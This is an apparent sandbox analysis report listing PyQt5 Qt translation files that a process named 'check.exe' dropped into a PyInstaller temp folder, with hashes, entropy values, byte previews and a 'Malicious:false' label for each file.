                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_da.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                                                      MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                                                      SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                                                      SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                                                      SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_de.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                                                      MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                                                      SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                                                      SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                                                      SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_en.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_es.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                                                      MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                                                      SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                                                      SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                                                      SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_fa.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):293121
                                                                                                                                                                                                                                      Entropy (8bit):5.272179385890926
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                                                      MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                                                      SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                                                      SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                                                      SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_fi.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117
                                                                                                                                                                                                                                      Entropy (8bit):3.739162292019161
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                                                      MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                                                      SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                                                      SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                                                      SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_fr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.680458675741643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                                                      MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                                                      SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                                                      SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                                                      SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_gd.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70
                                                                                                                                                                                                                                      Entropy (8bit):4.463523104731333
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                                                      MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                                                      SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                                                      SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                                                      SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_gl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):323590
                                                                                                                                                                                                                                      Entropy (8bit):4.568068046062524
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                                                      MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                                                      SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                                                      SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                                                      SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gl_ESB..I....*.......+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9...............*.......)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_he.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83
                                                                                                                                                                                                                                      Entropy (8bit):3.880645689209568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                                                      MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                                                      SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                                                      SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                                                      SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_ar.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8743
                                                                                                                                                                                                                                      Entropy (8bit):5.189558605179696
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                                                      MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                                                      SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                                                      SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                                                      SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......arB.....(.....d.0T....*.5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8.*.9.0.Q.1. .F.3... .E.D.A.Q. .'.D.*.Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.......*.9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>.*.9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L.*.9.0.Q.1. .*.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_bg.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10599
                                                                                                                                                                                                                                      Entropy (8bit):5.192287379770591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                                                      MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                                                      SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                                                      SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                                                      SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_ca.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7444
                                                                                                                                                                                                                                      Entropy (8bit):4.580794980254807
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                                                      MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                                                      SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                                                      SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                                                      SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_cs.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):15297
                                                                                                                                                                                                                                      Entropy (8bit):4.708378368926237
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                                                      MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                                                      SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                                                      SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                                                      SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....*B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!....*..K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_da.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4795
                                                                                                                                                                                                                                      Entropy (8bit):4.530246422531362
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                                                      MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                                                      SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                                                      SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                                                      SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_de.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7570
                                                                                                                                                                                                                                      Entropy (8bit):4.550982634910665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                                                      MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                                                      SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                                                      SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
